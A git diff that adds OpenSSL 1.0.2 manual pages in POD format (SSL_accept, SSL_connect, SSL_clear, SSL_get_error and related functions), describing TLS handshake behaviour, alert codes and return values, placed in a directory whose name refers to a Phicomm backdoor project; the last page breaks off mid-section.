diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_accept.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_accept.pod
new file mode 100644
index 0000000..89ad6bd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_accept.pod
@@ -0,0 +1,73 @@
+=pod
+
+=head1 NAME
+
+SSL_accept - wait for a TLS/SSL client to initiate a TLS/SSL handshake
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_accept(SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_accept() waits for a TLS/SSL client to initiate the TLS/SSL handshake.
+The communication channel must already have been set and assigned to the
+B<ssl> by setting an underlying B<BIO>.
+
+=head1 NOTES
+
+The behaviour of SSL_accept() depends on the underlying BIO. 
+
+If the underlying BIO is B<blocking>, SSL_accept() will only return once the
+handshake has been finished or an error occurred.
+
+If the underlying BIO is B<non-blocking>, SSL_accept() will also return
+when the underlying BIO could not satisfy the needs of SSL_accept()
+to continue the handshake, indicating the problem by the return value -1.
+In this case a call to SSL_get_error() with the
+return value of SSL_accept() will yield B<SSL_ERROR_WANT_READ> or
+B<SSL_ERROR_WANT_WRITE>. The calling process then must repeat the call after
+taking appropriate action to satisfy the needs of SSL_accept().
+The action depends on the underlying BIO. When using a non-blocking socket,
+nothing is to be done, but select() can be used to check for the required
+condition. When using a buffering BIO, like a BIO pair, data must be written
+into or retrieved out of the BIO before being able to continue.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item Z<>0
+
+The TLS/SSL handshake was not successful but was shut down controlled and
+by the specifications of the TLS/SSL protocol. Call SSL_get_error() with the
+return value B<ret> to find out the reason.
+
+=item Z<>1
+
+The TLS/SSL handshake was successfully completed, a TLS/SSL connection has been
+established.
+
+=item E<lt>0
+
+The TLS/SSL handshake was not successful because a fatal error occurred either
+at the protocol level or a connection failure occurred. The shutdown was
+not clean. It can also occur of action is need to continue the operation
+for non-blocking BIOs. Call SSL_get_error() with the return value B<ret>
+to find out the reason.
+
+=back
+
+=head1 SEE ALSO
+
+L<SSL_get_error(3)|SSL_get_error(3)>, L<SSL_connect(3)|SSL_connect(3)>,
+L<SSL_shutdown(3)|SSL_shutdown(3)>, L<ssl(3)|ssl(3)>, L<bio(3)|bio(3)>,
+L<SSL_set_connect_state(3)|SSL_set_connect_state(3)>,
+L<SSL_do_handshake(3)|SSL_do_handshake(3)>,
+L<SSL_CTX_new(3)|SSL_CTX_new(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_alert_type_string.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_alert_type_string.pod
new file mode 100644
index 0000000..0329c34
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_alert_type_string.pod
@@ -0,0 +1,233 @@
+=pod
+
+=head1 NAME
+
+SSL_alert_type_string, SSL_alert_type_string_long, SSL_alert_desc_string, SSL_alert_desc_string_long - get textual description of alert information
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ const char *SSL_alert_type_string(int value);
+ const char *SSL_alert_type_string_long(int value);
+
+ const char *SSL_alert_desc_string(int value);
+ const char *SSL_alert_desc_string_long(int value);
+
+=head1 DESCRIPTION
+
+SSL_alert_type_string() returns a one letter string indicating the
+type of the alert specified by B<value>.
+
+SSL_alert_type_string_long() returns a string indicating the type of the alert
+specified by B<value>.
+
+SSL_alert_desc_string() returns a two letter string as a short form
+describing the reason of the alert specified by B<value>.
+
+SSL_alert_desc_string_long() returns a string describing the reason
+of the alert specified by B<value>.
+
+=head1 NOTES
+
+When one side of an SSL/TLS communication wants to inform the peer about
+a special situation, it sends an alert. The alert is sent as a special message
+and does not influence the normal data stream (unless its contents results
+in the communication being canceled).
+
+A warning alert is sent, when a non-fatal error condition occurs. The
+"close notify" alert is sent as a warning alert. Other examples for
+non-fatal errors are certificate errors ("certificate expired",
+"unsupported certificate"), for which a warning alert may be sent.
+(The sending party may however decide to send a fatal error.) The
+receiving side may cancel the connection on reception of a warning
+alert on it discretion.
+
+Several alert messages must be sent as fatal alert messages as specified
+by the TLS RFC. A fatal alert always leads to a connection abort.
+
+=head1 RETURN VALUES
+
+The following strings can occur for SSL_alert_type_string() or
+SSL_alert_type_string_long():
+
+=over 4
+
+=item "W"/"warning"
+
+=item "F"/"fatal"
+
+=item "U"/"unknown"
+
+This indicates that no support is available for this alert type.
+Probably B<value> does not contain a correct alert message.
+
+=back
+
+The following strings can occur for SSL_alert_desc_string() or
+SSL_alert_desc_string_long():
+
+=over 4
+
+=item "CN"/"close notify"
+
+The connection shall be closed. This is a warning alert.
+
+=item "UM"/"unexpected message"
+
+An inappropriate message was received. This alert is always fatal
+and should never be observed in communication between proper
+implementations.
+
+=item "BM"/"bad record mac"
+
+This alert is returned if a record is received with an incorrect
+MAC. This message is always fatal.
+
+=item "DF"/"decompression failure"
+
+The decompression function received improper input (e.g. data
+that would expand to excessive length). This message is always
+fatal.
+
+=item "HF"/"handshake failure"
+
+Reception of a handshake_failure alert message indicates that the
+sender was unable to negotiate an acceptable set of security
+parameters given the options available. This is a fatal error.
+
+=item "NC"/"no certificate"
+
+A client, that was asked to send a certificate, does not send a certificate
+(SSLv3 only).
+
+=item "BC"/"bad certificate"
+
+A certificate was corrupt, contained signatures that did not
+verify correctly, etc
+
+=item "UC"/"unsupported certificate"
+
+A certificate was of an unsupported type.
+
+=item "CR"/"certificate revoked"
+
+A certificate was revoked by its signer.
+
+=item "CE"/"certificate expired"
+
+A certificate has expired or is not currently valid.
+
+=item "CU"/"certificate unknown"
+
+Some other (unspecified) issue arose in processing the
+certificate, rendering it unacceptable.
+
+=item "IP"/"illegal parameter"
+
+A field in the handshake was out of range or inconsistent with
+other fields. This is always fatal.
+
+=item "DC"/"decryption failed"
+
+A TLSCiphertext decrypted in an invalid way: either it wasn't an
+even multiple of the block length or its padding values, when
+checked, weren't correct. This message is always fatal.
+
+=item "RO"/"record overflow"
+
+A TLSCiphertext record was received which had a length more than
+2^14+2048 bytes, or a record decrypted to a TLSCompressed record
+with more than 2^14+1024 bytes. This message is always fatal.
+
+=item "CA"/"unknown CA"
+
+A valid certificate chain or partial chain was received, but the
+certificate was not accepted because the CA certificate could not
+be located or couldn't be matched with a known, trusted CA.  This
+message is always fatal.
+
+=item "AD"/"access denied"
+
+A valid certificate was received, but when access control was
+applied, the sender decided not to proceed with negotiation.
+This message is always fatal.
+
+=item "DE"/"decode error"
+
+A message could not be decoded because some field was out of the
+specified range or the length of the message was incorrect. This
+message is always fatal.
+
+=item "CY"/"decrypt error"
+
+A handshake cryptographic operation failed, including being
+unable to correctly verify a signature, decrypt a key exchange,
+or validate a finished message.
+
+=item "ER"/"export restriction"
+
+A negotiation not in compliance with export restrictions was
+detected; for example, attempting to transfer a 1024 bit
+ephemeral RSA key for the RSA_EXPORT handshake method. This
+message is always fatal.
+
+=item "PV"/"protocol version"
+
+The protocol version the client has attempted to negotiate is
+recognized, but not supported. (For example, old protocol
+versions might be avoided for security reasons). This message is
+always fatal.
+
+=item "IS"/"insufficient security"
+
+Returned instead of handshake_failure when a negotiation has
+failed specifically because the server requires ciphers more
+secure than those supported by the client. This message is always
+fatal.
+
+=item "IE"/"internal error"
+
+An internal error unrelated to the peer or the correctness of the
+protocol makes it impossible to continue (such as a memory
+allocation failure). This message is always fatal.
+
+=item "US"/"user canceled"
+
+This handshake is being canceled for some reason unrelated to a
+protocol failure. If the user cancels an operation after the
+handshake is complete, just closing the connection by sending a
+close_notify is more appropriate. This alert should be followed
+by a close_notify. This message is generally a warning.
+
+=item "NR"/"no renegotiation"
+
+Sent by the client in response to a hello request or by the
+server in response to a client hello after initial handshaking.
+Either of these would normally lead to renegotiation; when that
+is not appropriate, the recipient should respond with this alert;
+at that point, the original requester can decide whether to
+proceed with the connection. One case where this would be
+appropriate would be where a server has spawned a process to
+satisfy a request; the process might receive security parameters
+(key length, authentication, etc.) at startup and it might be
+difficult to communicate changes to these parameters after that
+point. This message is always a warning.
+
+=item "UP"/"unknown PSK identity"
+
+Sent by the server to indicate that it does not recognize a PSK
+identity or an SRP identity. 
+
+=item "UK"/"unknown"
+
+This indicates that no description is available for this alert type.
+Probably B<value> does not contain a correct alert message.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_CTX_set_info_callback(3)|SSL_CTX_set_info_callback(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_clear.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_clear.pod
new file mode 100644
index 0000000..ba192bd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_clear.pod
@@ -0,0 +1,75 @@
+=pod
+
+=head1 NAME
+
+SSL_clear - reset SSL object to allow another connection
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_clear(SSL *ssl);
+
+=head1 DESCRIPTION
+
+Reset B<ssl> to allow another connection. All settings (method, ciphers,
+BIOs) are kept.
+
+=head1 NOTES
+
+SSL_clear is used to prepare an SSL object for a new connection. While all
+settings are kept, a side effect is the handling of the current SSL session.
+If a session is still B<open>, it is considered bad and will be removed
+from the session cache, as required by RFC2246. A session is considered open,
+if L<SSL_shutdown(3)|SSL_shutdown(3)> was not called for the connection
+or at least L<SSL_set_shutdown(3)|SSL_set_shutdown(3)> was used to
+set the SSL_SENT_SHUTDOWN state.
+
+If a session was closed cleanly, the session object will be kept and all
+settings corresponding. This explicitly means, that e.g. the special method
+used during the session will be kept for the next handshake. So if the
+session was a TLSv1 session, a SSL client object will use a TLSv1 client
+method for the next handshake and a SSL server object will use a TLSv1
+server method, even if SSLv23_*_methods were chosen on startup. This
+will might lead to connection failures (see L<SSL_new(3)|SSL_new(3)>)
+for a description of the method's properties.
+
+=head1 WARNINGS
+
+SSL_clear() resets the SSL object to allow for another connection. The
+reset operation however keeps several settings of the last sessions
+(some of these settings were made automatically during the last
+handshake). It only makes sense for a new connection with the exact
+same peer that shares these settings, and may fail if that peer
+changes its settings between connections. Use the sequence
+L<SSL_get_session(3)|SSL_get_session(3)>;
+L<SSL_new(3)|SSL_new(3)>;
+L<SSL_set_session(3)|SSL_set_session(3)>;
+L<SSL_free(3)|SSL_free(3)>
+instead to avoid such failures
+(or simply L<SSL_free(3)|SSL_free(3)>; L<SSL_new(3)|SSL_new(3)>
+if session reuse is not desired).
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item Z<>0
+
+The SSL_clear() operation could not be performed. Check the error stack to
+find out the reason.
+
+=item Z<>1
+
+The SSL_clear() operation was successful.
+
+=back
+
+L<SSL_new(3)|SSL_new(3)>, L<SSL_free(3)|SSL_free(3)>,
+L<SSL_shutdown(3)|SSL_shutdown(3)>, L<SSL_set_shutdown(3)|SSL_set_shutdown(3)>,
+L<SSL_CTX_set_options(3)|SSL_CTX_set_options(3)>, L<ssl(3)|ssl(3)>,
+L<SSL_CTX_set_client_cert_cb(3)|SSL_CTX_set_client_cert_cb(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_connect.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_connect.pod
new file mode 100644
index 0000000..68e2b82
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_connect.pod
@@ -0,0 +1,73 @@
+=pod
+
+=head1 NAME
+
+SSL_connect - initiate the TLS/SSL handshake with an TLS/SSL server
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_connect(SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_connect() initiates the TLS/SSL handshake with a server. The communication
+channel must already have been set and assigned to the B<ssl> by setting an
+underlying B<BIO>.
+
+=head1 NOTES
+
+The behaviour of SSL_connect() depends on the underlying BIO. 
+
+If the underlying BIO is B<blocking>, SSL_connect() will only return once the
+handshake has been finished or an error occurred.
+
+If the underlying BIO is B<non-blocking>, SSL_connect() will also return
+when the underlying BIO could not satisfy the needs of SSL_connect()
+to continue the handshake, indicating the problem by the return value -1.
+In this case a call to SSL_get_error() with the
+return value of SSL_connect() will yield B<SSL_ERROR_WANT_READ> or
+B<SSL_ERROR_WANT_WRITE>. The calling process then must repeat the call after
+taking appropriate action to satisfy the needs of SSL_connect().
+The action depends on the underlying BIO. When using a non-blocking socket,
+nothing is to be done, but select() can be used to check for the required
+condition. When using a buffering BIO, like a BIO pair, data must be written
+into or retrieved out of the BIO before being able to continue.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item Z<>0
+
+The TLS/SSL handshake was not successful but was shut down controlled and
+by the specifications of the TLS/SSL protocol. Call SSL_get_error() with the
+return value B<ret> to find out the reason.
+
+=item Z<>1
+
+The TLS/SSL handshake was successfully completed, a TLS/SSL connection has been
+established.
+
+=item E<lt>0
+
+The TLS/SSL handshake was not successful, because a fatal error occurred either
+at the protocol level or a connection failure occurred. The shutdown was
+not clean. It can also occur of action is need to continue the operation
+for non-blocking BIOs. Call SSL_get_error() with the return value B<ret>
+to find out the reason.
+
+=back
+
+=head1 SEE ALSO
+
+L<SSL_get_error(3)|SSL_get_error(3)>, L<SSL_accept(3)|SSL_accept(3)>,
+L<SSL_shutdown(3)|SSL_shutdown(3)>, L<ssl(3)|ssl(3)>, L<bio(3)|bio(3)>,
+L<SSL_set_connect_state(3)|SSL_set_connect_state(3)>,
+L<SSL_do_handshake(3)|SSL_do_handshake(3)>,
+L<SSL_CTX_new(3)|SSL_CTX_new(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_do_handshake.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_do_handshake.pod
new file mode 100644
index 0000000..8b590c9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_do_handshake.pod
@@ -0,0 +1,72 @@
+=pod
+
+=head1 NAME
+
+SSL_do_handshake - perform a TLS/SSL handshake
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_do_handshake(SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_do_handshake() will wait for a SSL/TLS handshake to take place. If the
+connection is in client mode, the handshake will be started. The handshake
+routines may have to be explicitly set in advance using either
+L<SSL_set_connect_state(3)|SSL_set_connect_state(3)> or
+L<SSL_set_accept_state(3)|SSL_set_accept_state(3)>.
+
+=head1 NOTES
+
+The behaviour of SSL_do_handshake() depends on the underlying BIO.
+
+If the underlying BIO is B<blocking>, SSL_do_handshake() will only return
+once the handshake has been finished or an error occurred.
+
+If the underlying BIO is B<non-blocking>, SSL_do_handshake() will also return
+when the underlying BIO could not satisfy the needs of SSL_do_handshake()
+to continue the handshake. In this case a call to SSL_get_error() with the
+return value of SSL_do_handshake() will yield B<SSL_ERROR_WANT_READ> or
+B<SSL_ERROR_WANT_WRITE>. The calling process then must repeat the call after
+taking appropriate action to satisfy the needs of SSL_do_handshake().
+The action depends on the underlying BIO. When using a non-blocking socket,
+nothing is to be done, but select() can be used to check for the required
+condition. When using a buffering BIO, like a BIO pair, data must be written
+into or retrieved out of the BIO before being able to continue.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item Z<>0
+
+The TLS/SSL handshake was not successful but was shut down controlled and
+by the specifications of the TLS/SSL protocol. Call SSL_get_error() with the
+return value B<ret> to find out the reason.
+
+=item Z<>1
+
+The TLS/SSL handshake was successfully completed, a TLS/SSL connection has been
+established.
+
+=item E<lt>0
+
+The TLS/SSL handshake was not successful because a fatal error occurred either
+at the protocol level or a connection failure occurred. The shutdown was
+not clean. It can also occur of action is need to continue the operation
+for non-blocking BIOs. Call SSL_get_error() with the return value B<ret>
+to find out the reason.
+
+=back
+
+=head1 SEE ALSO
+
+L<SSL_get_error(3)|SSL_get_error(3)>, L<SSL_connect(3)|SSL_connect(3)>,
+L<SSL_accept(3)|SSL_accept(3)>, L<ssl(3)|ssl(3)>, L<bio(3)|bio(3)>,
+L<SSL_set_connect_state(3)|SSL_set_connect_state(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_free.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_free.pod
new file mode 100644
index 0000000..13c1abd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_free.pod
@@ -0,0 +1,44 @@
+=pod
+
+=head1 NAME
+
+SSL_free - free an allocated SSL structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_free(SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_free() decrements the reference count of B<ssl>, and removes the SSL
+structure pointed to by B<ssl> and frees up the allocated memory if the
+reference count has reached 0.
+
+=head1 NOTES
+
+SSL_free() also calls the free()ing procedures for indirectly affected items, if
+applicable: the buffering BIO, the read and write BIOs,
+cipher lists specially created for this B<ssl>, the B<SSL_SESSION>.
+Do not explicitly free these indirectly freed up items before or after
+calling SSL_free(), as trying to free things twice may lead to program
+failure.
+
+The ssl session has reference counts from two users: the SSL object, for
+which the reference count is removed by SSL_free() and the internal
+session cache. If the session is considered bad, because
+L<SSL_shutdown(3)|SSL_shutdown(3)> was not called for the connection
+and L<SSL_set_shutdown(3)|SSL_set_shutdown(3)> was not used to set the
+SSL_SENT_SHUTDOWN state, the session will also be removed
+from the session cache as required by RFC2246.
+
+=head1 RETURN VALUES
+
+SSL_free() does not provide diagnostic information.
+
+L<SSL_new(3)|SSL_new(3)>, L<SSL_clear(3)|SSL_clear(3)>,
+L<SSL_shutdown(3)|SSL_shutdown(3)>, L<SSL_set_shutdown(3)|SSL_set_shutdown(3)>,
+L<ssl(3)|ssl(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_SSL_CTX.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_SSL_CTX.pod
new file mode 100644
index 0000000..659c482
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_SSL_CTX.pod
@@ -0,0 +1,26 @@
+=pod
+
+=head1 NAME
+
+SSL_get_SSL_CTX - get the SSL_CTX from which an SSL is created
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ SSL_CTX *SSL_get_SSL_CTX(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_get_SSL_CTX() returns a pointer to the SSL_CTX object, from which
+B<ssl> was created with L<SSL_new(3)|SSL_new(3)>.
+
+=head1 RETURN VALUES
+
+The pointer to the SSL_CTX object is returned.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_new(3)|SSL_new(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_ciphers.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_ciphers.pod
new file mode 100644
index 0000000..aecadd9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_ciphers.pod
@@ -0,0 +1,42 @@
+=pod
+
+=head1 NAME
+
+SSL_get_ciphers, SSL_get_cipher_list - get list of available SSL_CIPHERs
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ STACK_OF(SSL_CIPHER) *SSL_get_ciphers(const SSL *ssl);
+ const char *SSL_get_cipher_list(const SSL *ssl, int priority);
+
+=head1 DESCRIPTION
+
+SSL_get_ciphers() returns the stack of available SSL_CIPHERs for B<ssl>,
+sorted by preference. If B<ssl> is NULL or no ciphers are available, NULL
+is returned.
+
+SSL_get_cipher_list() returns a pointer to the name of the SSL_CIPHER
+listed for B<ssl> with B<priority>. If B<ssl> is NULL, no ciphers are
+available, or there are less ciphers than B<priority> available, NULL
+is returned.
+
+=head1 NOTES
+
+The details of the ciphers obtained by SSL_get_ciphers() can be obtained using
+the L<SSL_CIPHER_get_name(3)|SSL_CIPHER_get_name(3)> family of functions.
+
+Call SSL_get_cipher_list() with B<priority> starting from 0 to obtain the
+sorted list of available ciphers, until NULL is returned.
+
+=head1 RETURN VALUES
+
+See DESCRIPTION
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_CTX_set_cipher_list(3)|SSL_CTX_set_cipher_list(3)>,
+L<SSL_CIPHER_get_name(3)|SSL_CIPHER_get_name(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_client_CA_list.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_client_CA_list.pod
new file mode 100644
index 0000000..68181b2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_client_CA_list.pod
@@ -0,0 +1,53 @@
+=pod
+
+=head1 NAME
+
+SSL_get_client_CA_list, SSL_CTX_get_client_CA_list - get list of client CAs
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ STACK_OF(X509_NAME) *SSL_get_client_CA_list(const SSL *s);
+ STACK_OF(X509_NAME) *SSL_CTX_get_client_CA_list(const SSL_CTX *ctx); 
+
+=head1 DESCRIPTION
+
+SSL_CTX_get_client_CA_list() returns the list of client CAs explicitly set for
+B<ctx> using L<SSL_CTX_set_client_CA_list(3)|SSL_CTX_set_client_CA_list(3)>.
+
+SSL_get_client_CA_list() returns the list of client CAs explicitly
+set for B<ssl> using SSL_set_client_CA_list() or B<ssl>'s SSL_CTX object with
+L<SSL_CTX_set_client_CA_list(3)|SSL_CTX_set_client_CA_list(3)>, when in
+server mode. In client mode, SSL_get_client_CA_list returns the list of
+client CAs sent from the server, if any.
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_client_CA_list() and SSL_set_client_CA_list() do not return
+diagnostic information.
+
+SSL_CTX_add_client_CA() and SSL_add_client_CA() have the following return
+values:
+
+=over 4
+
+=item STACK_OF(X509_NAMES)
+
+List of CA names explicitly set (for B<ctx> or in server mode) or send
+by the server (client mode).
+
+=item NULL
+
+No client CA list was explicitly set (for B<ctx> or in server mode) or
+the server did not send a list of CAs (client mode).
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_CTX_set_client_CA_list(3)|SSL_CTX_set_client_CA_list(3)>,
+L<SSL_CTX_set_client_cert_cb(3)|SSL_CTX_set_client_cert_cb(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_current_cipher.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_current_cipher.pod
new file mode 100644
index 0000000..e5ab124
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_current_cipher.pod
@@ -0,0 +1,43 @@
+=pod
+
+=head1 NAME
+
+SSL_get_current_cipher, SSL_get_cipher, SSL_get_cipher_name,
+SSL_get_cipher_bits, SSL_get_cipher_version - get SSL_CIPHER of a connection
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ SSL_CIPHER *SSL_get_current_cipher(const SSL *ssl);
+ #define SSL_get_cipher(s) \
+                SSL_CIPHER_get_name(SSL_get_current_cipher(s))
+ #define SSL_get_cipher_name(s) \
+                SSL_CIPHER_get_name(SSL_get_current_cipher(s))
+ #define SSL_get_cipher_bits(s,np) \
+                SSL_CIPHER_get_bits(SSL_get_current_cipher(s),np)
+ #define SSL_get_cipher_version(s) \
+                SSL_CIPHER_get_version(SSL_get_current_cipher(s))
+
+=head1 DESCRIPTION
+
+SSL_get_current_cipher() returns a pointer to an SSL_CIPHER object containing
+the description of the actually used cipher of a connection established with
+the B<ssl> object.
+
+SSL_get_cipher() and SSL_get_cipher_name() are identical macros to obtain the
+name of the currently used cipher. SSL_get_cipher_bits() is a
+macro to obtain the number of secret/algorithm bits used and 
+SSL_get_cipher_version() returns the protocol name.
+See L<SSL_CIPHER_get_name(3)|SSL_CIPHER_get_name(3)> for more details.
+
+=head1 RETURN VALUES
+
+SSL_get_current_cipher() returns the cipher actually used or NULL, when
+no session has been established.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_CIPHER_get_name(3)|SSL_CIPHER_get_name(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_default_timeout.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_default_timeout.pod
new file mode 100644
index 0000000..a648a9b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_default_timeout.pod
@@ -0,0 +1,41 @@
+=pod
+
+=head1 NAME
+
+SSL_get_default_timeout - get default session timeout value
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ long SSL_get_default_timeout(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_get_default_timeout() returns the default timeout value assigned to
+SSL_SESSION objects negotiated for the protocol valid for B<ssl>.
+
+=head1 NOTES
+
+Whenever a new session is negotiated, it is assigned a timeout value,
+after which it will not be accepted for session reuse. If the timeout
+value was not explicitly set using
+L<SSL_CTX_set_timeout(3)|SSL_CTX_set_timeout(3)>, the hardcoded default
+timeout for the protocol will be used.
+
+SSL_get_default_timeout() return this hardcoded value, which is 300 seconds
+for all currently supported protocols (SSLv2, SSLv3, and TLSv1).
+
+=head1 RETURN VALUES
+
+See description.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>,
+L<SSL_SESSION_get_time(3)|SSL_SESSION_get_time(3)>,
+L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)>,
+L<SSL_get_default_timeout(3)|SSL_get_default_timeout(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_error.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_error.pod
new file mode 100644
index 0000000..48c6b15
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_error.pod
@@ -0,0 +1,114 @@
+=pod
+
+=head1 NAME
+
+SSL_get_error - obtain result code for TLS/SSL I/O operation
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_get_error(const SSL *ssl, int ret);
+
+=head1 DESCRIPTION
+
+SSL_get_error() returns a result code (suitable for the C "switch"
+statement) for a preceding call to SSL_connect(), SSL_accept(), SSL_do_handshake(),
+SSL_read(), SSL_peek(), or SSL_write() on B<ssl>.  The value returned by
+that TLS/SSL I/O function must be passed to SSL_get_error() in parameter
+B<ret>.
+
+In addition to B<ssl> and B<ret>, SSL_get_error() inspects the
+current thread's OpenSSL error queue.  Thus, SSL_get_error() must be
+used in the same thread that performed the TLS/SSL I/O operation, and no
+other OpenSSL function calls should appear in between.  The current
+thread's error queue must be empty before the TLS/SSL I/O operation is
+attempted, or SSL_get_error() will not work reliably.
+
+=head1 RETURN VALUES
+
+The following return values can currently occur:
+
+=over 4
+
+=item SSL_ERROR_NONE
+
+The TLS/SSL I/O operation completed.  This result code is returned
+if and only if B<ret E<gt> 0>.
+
+=item SSL_ERROR_ZERO_RETURN
+
+The TLS/SSL connection has been closed.  If the protocol version is SSL 3.0
+or TLS 1.0, this result code is returned only if a closure
+alert has occurred in the protocol, i.e. if the connection has been
+closed cleanly. Note that in this case B<SSL_ERROR_ZERO_RETURN>
+does not necessarily indicate that the underlying transport
+has been closed.
+
+=item SSL_ERROR_WANT_READ, SSL_ERROR_WANT_WRITE
+
+The operation did not complete; the same TLS/SSL I/O function should be
+called again later.  If, by then, the underlying B<BIO> has data
+available for reading (if the result code is B<SSL_ERROR_WANT_READ>)
+or allows writing data (B<SSL_ERROR_WANT_WRITE>), then some TLS/SSL
+protocol progress will take place, i.e. at least part of an TLS/SSL
+record will be read or written.  Note that the retry may again lead to
+a B<SSL_ERROR_WANT_READ> or B<SSL_ERROR_WANT_WRITE> condition.
+There is no fixed upper limit for the number of iterations that
+may be necessary until progress becomes visible at application
+protocol level.
+
+For socket B<BIO>s (e.g. when SSL_set_fd() was used), select() or
+poll() on the underlying socket can be used to find out when the
+TLS/SSL I/O function should be retried.
+
+Caveat: Any TLS/SSL I/O function can lead to either of
+B<SSL_ERROR_WANT_READ> and B<SSL_ERROR_WANT_WRITE>.  In particular,
+SSL_read() or SSL_peek() may want to write data and SSL_write() may want
+to read data.  This is mainly because TLS/SSL handshakes may occur at any
+time during the protocol (initiated by either the client or the server);
+SSL_read(), SSL_peek(), and SSL_write() will handle any pending handshakes.
+
